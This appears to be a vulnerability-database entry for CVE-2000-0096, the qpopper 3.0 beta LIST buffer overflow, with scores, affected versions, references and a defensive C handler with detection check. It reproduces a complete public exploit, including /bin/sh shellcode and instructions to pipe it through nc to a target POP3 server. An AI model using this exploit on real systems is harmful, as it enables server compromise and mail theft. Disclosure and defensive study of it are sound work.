CVE-2000-0096
CVSS 7.2
Published: 2000-01-26 00:00:00
Revised: 2008-09-10 15:02:54

[Original] Buffer overflow in qpopper 3.0 beta versions allows local users to gain privileges via a long LIST command.


[CNNVD] Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability (CNNVD-200001-055)

        A buffer overflow vulnerability exists in the qpopper 3.0 beta versions. Local users can gain elevated privileges via an overly long LIST command.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:qualcomm:qpopper:3.0beta17
cpe:/a:qualcomm:qpopper:3.0beta16
cpe:/a:qualcomm:qpopper:3.0beta28
cpe:/a:qualcomm:qpopper:3.0beta20
cpe:/a:qualcomm:qpopper:3.0beta1
cpe:/a:qualcomm:qpopper:3.0beta14
cpe:/a:qualcomm:qpopper:3.0
cpe:/a:qualcomm:qpopper:3.0beta25
cpe:/a:qualcomm:qpopper:3.0beta19
cpe:/a:qualcomm:qpopper:3.0beta3
cpe:/a:qualcomm:qpopper:3.0beta4
cpe:/a:qualcomm:qpopper:3.0beta18
cpe:/a:qualcomm:qpopper:3.0beta7
cpe:/a:qualcomm:qpopper:3.0beta29
cpe:/a:qualcomm:qpopper:3.0beta24
cpe:/a:qualcomm:qpopper:3.0beta8
cpe:/a:qualcomm:qpopper:3.0beta15
cpe:/a:qualcomm:qpopper:3.0beta11
cpe:/a:qualcomm:qpopper:3.0beta26
cpe:/a:qualcomm:qpopper:3.0beta23
cpe:/a:qualcomm:qpopper:3.0beta13
cpe:/a:qualcomm:qpopper:3.0beta12
cpe:/a:qualcomm:qpopper:3.0beta6
cpe:/a:qualcomm:qpopper:3.0beta21
cpe:/a:qualcomm:qpopper:3.0beta2
cpe:/a:qualcomm:qpopper:3.0beta22
cpe:/a:qualcomm:qpopper:3.0beta9
cpe:/a:qualcomm:qpopper:3.0beta10
cpe:/a:qualcomm:qpopper:3.0beta5
cpe:/a:qualcomm:qpopper:3.0beta27

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0096
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0096
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200001-055
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/948
(UNKNOWN)  BID  948

- Vulnerability information

Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability
High severity  Buffer overflow
2000-01-26 00:00:00 2005-10-20 00:00:00
Remote / Local
        A buffer overflow vulnerability exists in the qpopper 3.0 beta versions. Local users can gain elevated privileges via an overly long LIST command.

- Advisories and patches

        The vendor released fixes to address this issue. Please see the references section for further information.

- Vulnerability information (19729)

Qualcomm qpopper 3.0 'LIST' Buffer Overflow Vulnerability (EDBID:19729)
linux remote
2000-01-10 Verified
0 Zhodiac
source: http://www.securityfocus.com/bid/948/info

A remotely exploitable buffer-overflow vulnerability affects Qualcomm's 'qpopper' daemon. This issue allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon.

The problem lies in the code that handles the 'LIST' command available to logged-in users. By providing an overly long argument, an attacker may cause a buffer to overflow. As a result, the attacker can gain access with the user ID (UID) of the user whose account is being used for the attack and with the group ID (GID) mail.

This will allow remote attackers to access the server itself and possibly (depending on how the computer is configured) to read other users' mail via the GID mail. 

/*
 * !Hispahack Research Team  
 * http://hispahack.ccc.de
 *
 * By Zhodiac <zhodiac@softhome.net>
 *
 * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
 * Overflow at pop_list()->pop_msg()
 *
 * Tested: 3.0beta28  offset=0
 *         3.0beta26  offset=0
 *         3.0beta25  offset=0
 *
 * #include <standar/disclaimer.h>
 *
 * This code is dedicated to my love [CrAsH]] and to all the people who
 * were raided in Spain in the last few days.
 *
 * Madrid 10/1/2000
 *
 */

#include <stdio.h>
#include <stdlib.h>     /* exit(), atol() */
#include <string.h>     /* memset(), memcpy(), strlen() */
#include <unistd.h>     /* sleep() */

#define BUFFERSIZE 1004
#define NOP 0x90
#define OFFSET 0xbfffd9c4

/* Linux x86 payload that execs /bin/sh */
char shellcode[]=
 "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
 "\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
 "\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";

void usage(char *progname) {
 fprintf(stderr,"Usage: (%s <login> <password> [<offset>]; cat) | nc <target> 110\n",progname);
 exit(1);
}

int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE];
unsigned long *long_ptr,offset=OFFSET;
int aux;

 fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
 fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n");

 if (argc<3) usage(argv[0]);

 if (argc==4) offset+=atol(argv[3]);

 /* Buffer layout: NOP sled, shellcode, then four copies of the guessed address */
 ptr=buffer;
 memset(ptr,0,sizeof(buffer));
 memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
 ptr+=sizeof(buffer)-strlen(shellcode)-16;
 memcpy(ptr,shellcode,strlen(shellcode));
 ptr+=strlen(shellcode);
 long_ptr=(unsigned long*)ptr;
 for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
 ptr=(char *)long_ptr;
 *ptr='\0';

 fprintf(stderr,"Buffer size: %d\n",(int)strlen(buffer));
 fprintf(stderr,"Offset: 0x%lx\n\n",offset);

 /* The POP3 dialogue is written to stdout so it can be piped into nc */
 printf("USER %s\n",argv[1]);
 sleep(1);
 printf("PASS %s\n",argv[2]);
 sleep(1);
 printf("LIST 1 %s\n",buffer);
 sleep(1);
 printf("uname -a; id\n");

 return(0);
}


- Vulnerability information

12483
Qpopper LIST Command Local Overflow
Location: Local Access Required  Attack type: Input Manipulation
Impact: Loss of Integrity  Solution: Upgrade
Exploit: Exploit Public  Disclosure: Third-party Verified

- Vulnerability description

- Timeline

2000-01-26 Unknown
Unknown Unknown

- Solution

Upgrade to version 4.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability
Class: Boundary Condition Error  BID: 948
Remote: Yes  Local: Yes
Published: 2000-01-26 12:00:00  Updated: 2006-09-28 06:25:00
This bug was discovered by the !Hispahack Research Team and was posted to the Bugtraq mailing list by Zhodiac <zhodiac@softhome.net> on Wed, 26 Jan 2000.

- Affected program versions

Qualcomm qpopper 3.0 beta9
Qualcomm qpopper 3.0 beta8
Qualcomm qpopper 3.0 beta7
Qualcomm qpopper 3.0 beta6
Qualcomm qpopper 3.0 beta5
Qualcomm qpopper 3.0 beta4
Qualcomm qpopper 3.0 beta3
Qualcomm qpopper 3.0 beta29
Qualcomm qpopper 3.0 beta28
Qualcomm qpopper 3.0 beta27
Qualcomm qpopper 3.0 beta26
Qualcomm qpopper 3.0 beta25
Qualcomm qpopper 3.0 beta24
Qualcomm qpopper 3.0 beta23
Qualcomm qpopper 3.0 beta22
Qualcomm qpopper 3.0 beta21
Qualcomm qpopper 3.0 beta20
Qualcomm qpopper 3.0 beta2
Qualcomm qpopper 3.0 beta19
Qualcomm qpopper 3.0 beta18
Qualcomm qpopper 3.0 beta17
Qualcomm qpopper 3.0 beta16
Qualcomm qpopper 3.0 beta15
Qualcomm qpopper 3.0 beta14
Qualcomm qpopper 3.0 beta13
Qualcomm qpopper 3.0 beta12
Qualcomm qpopper 3.0 beta11
Qualcomm qpopper 3.0 beta10
Qualcomm qpopper 3.0 beta1
Qualcomm qpopper 3.0

- Unaffected program versions

Qualcomm qpopper 4.0.8
Qualcomm qpopper 4.0.7
Qualcomm qpopper 4.0.6
Qualcomm qpopper 4.0.5 fc2
Qualcomm qpopper 4.0.5
Qualcomm qpopper 4.0.4
Qualcomm qpopper 4.0.3
+ Caldera OpenServer 5.0.6
+ Caldera OpenServer 5.0.5
Qualcomm qpopper 4.0.2
Qualcomm qpopper 4.0.1
+ RedHat Linux 7.1
+ RedHat Linux 7.0
+ Sun Cobalt RaQ 4
Qualcomm qpopper 4.0 b14
Qualcomm qpopper 4.0 3
Qualcomm qpopper 4.0 2
Qualcomm qpopper 4.0 1
Qualcomm qpopper 4.0
Qualcomm qpopper 3.0 beta31
Qualcomm qpopper 3.0 beta30
Qualcomm qpopper 2.53
Qualcomm qpopper 2.52
Qualcomm qpopper 2.4
Qualcomm qpopper 4.0

- Vulnerability discussion

A remotely exploitable buffer-overflow vulnerability affects Qualcomm's 'qpopper' daemon. This issue allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon.

The problem lies in the code that handles the 'LIST' command available to logged-in users. By providing an overly long argument, an attacker may cause a buffer to overflow. As a result, the attacker can gain access with the user ID (UID) of the user whose account is being used for the attack and with the group ID (GID) mail.

This will allow remote attackers to access the server itself and possibly (depending on how the computer is configured) to read other users' mail via the GID mail.
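The description above (and the identical text in the exploit entry) comes down to one defect class: the argument of a logged-in user's LIST command reaches a fixed-size buffer without a length check. The following C is an added example, not qpopper's source, showing the two controls a defender wants at that point: a LIST handler that bounds argument length and reply formatting before anything is copied, and a check that flags over-long LIST lines in a captured POP3 session. The 40-character limit follows RFC 1939's argument length rule; REPLY_SIZE, MSG_COUNT, the per-message sizes and the session lines are constructed for the demonstration.

```c
/* Added example, not qpopper's source: a bounded POP3 LIST handler and a
 * session check for over-long LIST arguments. Assumed: MAX_ARG_LEN follows
 * RFC 1939's 40-character argument limit; REPLY_SIZE, MSG_COUNT and the
 * per-message sizes are constructed for the demonstration. */
#include <ctype.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ARG_LEN 40     /* RFC 1939: each argument may be up to 40 characters */
#define REPLY_SIZE  1024   /* constructed reply buffer size */
#define MSG_COUNT   3      /* constructed: messages in the mailbox */

/* Bounded reply formatter: 0 on success, -1 if the reply would not fit.
 * The bug class on this page is the unbounded variant (vsprintf into a
 * fixed buffer with no length check). */
static int format_reply(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= outlen) {
        if (outlen) out[0] = '\0';   /* never hand back a partial reply */
        return -1;
    }
    return 0;
}

/* Case-insensitive test for a LIST command line. */
static int is_list_command(const char *line)
{
    size_t i;
    for (i = 0; i < 4; i++)
        if (toupper((unsigned char)line[i]) != "LIST"[i]) return 0;
    return line[4] == '\0' || line[4] == ' ' || line[4] == '\r' || line[4] == '\n';
}

/* Length of everything after "LIST" (leading spaces skipped, CR/LF excluded). */
static size_t list_argument_length(const char *line)
{
    const char *p = line + 4;
    while (*p == ' ') p++;
    return strcspn(p, "\r\n");
}

/* Handle one LIST line: writes a POP3 reply into resp, returns 0 for +OK and
 * -1 for -ERR. Length and syntax are checked before any formatting, so the
 * client never controls how much is written into the reply buffer. */
int handle_list(const char *line, char *resp, size_t resplen)
{
    const char *arg;
    size_t arglen, i;
    long msg;

    if (!is_list_command(line)) {
        format_reply(resp, resplen, "-ERR unknown command\r\n");
        return -1;
    }
    arg = line + 4;
    while (*arg == ' ') arg++;
    arglen = list_argument_length(line);
    if (arglen == 0)
        return format_reply(resp, resplen, "+OK %d messages\r\n", MSG_COUNT);
    if (arglen > MAX_ARG_LEN) {
        format_reply(resp, resplen, "-ERR argument too long\r\n");
        return -1;
    }
    for (i = 0; i < arglen; i++)
        if (!isdigit((unsigned char)arg[i])) {
            format_reply(resp, resplen, "-ERR message number must be numeric\r\n");
            return -1;
        }
    msg = strtol(arg, NULL, 10);
    if (msg < 1 || msg > MSG_COUNT) {
        format_reply(resp, resplen, "-ERR no such message\r\n");
        return -1;
    }
    return format_reply(resp, resplen, "+OK %ld %ld\r\n", msg, msg * 1000L); /* constructed sizes */
}

/* Detection side: count LIST lines in a captured session whose argument
 * exceeds MAX_ARG_LEN, something no legitimate client sends. */
int count_overlong_list(const char *const *lines, size_t n)
{
    size_t i;
    int hits = 0;
    for (i = 0; i < n; i++)
        if (is_list_command(lines[i]) && list_argument_length(lines[i]) > MAX_ARG_LEN)
            hits++;
    return hits;
}

/* Constructed session with one 1004-byte LIST argument (the exploit's
 * BUFFERSIZE); returns the number of flagged lines, or -1 if the handler
 * failed to refuse the over-long line. */
int demo_session_hits(void)
{
    static char overlong[1024];
    const char *session[4];
    char resp[REPLY_SIZE];

    memcpy(overlong, "LIST 1 ", 7);
    memset(overlong + 7, 'A', 1004);
    memcpy(overlong + 7 + 1004, "\r\n", 3);
    session[0] = "USER alice\r\n";
    session[1] = "PASS s3cret\r\n";
    session[2] = "LIST 2\r\n";
    session[3] = overlong;
    if (handle_list(overlong, resp, sizeof resp) != -1) return -1;
    return count_overlong_list(session, 4);
}
```

The handler refuses the over-long line with `-ERR argument too long` before touching the reply buffer, and `format_reply` returns -1 rather than writing past `outlen` if a reply would not fit; the same length rule, applied to a session capture with `count_overlong_list`, gives a simple indicator for the traffic shape the exploit on this page produces.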

- Exploit

An exploit is available:

- Solution

The vendor released fixes to address this issue. Please see the references section for further information.

- References
